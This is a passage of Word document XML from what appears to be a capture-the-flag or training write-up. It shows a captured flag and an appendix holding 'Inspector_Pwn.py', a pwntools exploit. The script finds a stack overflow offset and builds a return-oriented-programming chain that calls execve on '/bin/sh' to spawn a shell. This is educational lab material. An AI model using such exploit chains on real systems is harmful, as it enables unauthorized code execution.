            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$ cat flag.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A4016F9" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>flag{first_day_of_pwn_school}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17644308" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C23F57" w14:textId="6DCA5DD6" w:rsidR="0062558E" w:rsidRDefault="0062558E" w:rsidP="00847435">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5084D3DB" w14:textId="19ACF26B" w:rsidR="0062558E" w:rsidRDefault="0062558E" w:rsidP="00767735">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Appendix_D:_BoD_Remote.py"/>
      <w:bookmarkStart w:id="30" w:name="_Appendix_D:_Lockbox_Pwn.py"/>
      <w:bookmarkStart w:id="31" w:name="_Appendix_D:_Backdoor_Pwn.py"/>
      <w:bookmarkStart w:id="32" w:name="_Appendix_D:_Inspector_Pwn.py"/>
      <w:bookmarkStart w:id="33" w:name="_Toc161243444"/>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidRPr="005264D0">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">D: </w:t>
      </w:r>
      <w:r w:rsidR="00F56DE3" w:rsidRPr="00F56DE3">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Inspector_Pwn.py</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="0062558E" w:rsidRPr="00E23C61" w14:paraId="4628BC57" w14:textId="77777777" w:rsidTr="00293072">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="1C2C880B" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>from pwn import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="736BD70C" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>from pwnlib.util.packing import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B25EB63" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>import re</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48C3EA8A" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>import struct</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F09851B" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>import math</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7507E991" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4B984F19" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t># A function to convert encoded input to a string and remove text format characters</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D1F4062" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Input: Encoded string</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22F5C253" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Output: Unencoded string</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="492CB202" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def cleanLine(ln):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52B5D7FC" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="252BAF8C" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>l = ansi_escape.sub('', str(ln, encoding='utf-8'))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17FA4EE6" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>return l</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78B19A81" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5081359B" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t># A function to find what part of the payload is being read as an address when the program crashes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07F26722" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Input: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="796B456F" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Output: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2353BB79" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def getOffset():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E4BC614" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p = process('./inspector')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BFAE527" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recvuntil("shell!")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0335D4A0" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline(cyclic(100))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="432AAE3B" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.wait()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="576AD870" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>cf = p.corefile</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38FE2AB6" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>stack = cf.rsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09B962C9" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>info("rsp = %#x", stack)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="280F6441" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>pattern = cf.read(stack, 4)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7185E408" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>offset = cyclic_find(pattern)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3889FF9E" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>info("offset = %d", offset)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21201BDA" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>return 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67D950A9" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="16F854C4" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t># A function to build the payload</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FD88FDC" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Input: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4213CEA7" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Output: Payload bytes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CEBAD72" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def buildPld():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48699A8C" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>addrA = p64(0x0040062e)</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># --&gt; `pop rdi ; ret`</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="165AC62D" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>datA = p64(0x00400708)</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># --&gt; `/bin/sh`</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3371739B" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>addrB = p64(0x00400636)</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># --&gt; `pop rsi ; ret`</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="226CD12F" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>addrC = p64(0x0040063e)</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># --&gt; `pop rdx ; ret`</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43A1C3AD" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>datBC = p64(0x00)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FDCA841" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>addrD = p64(0x00400646)</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># --&gt; `pop rax ; ret`</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F2F8860" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>datD = p64(0x3b)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D8F9EA6" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>addrE = p64(0x00400625)</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># --&gt; `syscall`</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29C5FCA1" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>addrF = p64(0x004004a9)</w:t>
            </w:r>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># --&gt; `ret`</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B797A6A" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>pad = cyclic(40)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E5A0ABF" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0F5B4437" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>pld = pad + addrA + datA + addrB + datBC + addrC + datBC + addrD + datD + addrE + addrF</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B54AB27" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>return pld</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A36C159" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="61A4466D" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t># A function to set breakpoints at each of the gadget addresses</w:t>
            </w:r>
          </w:p>
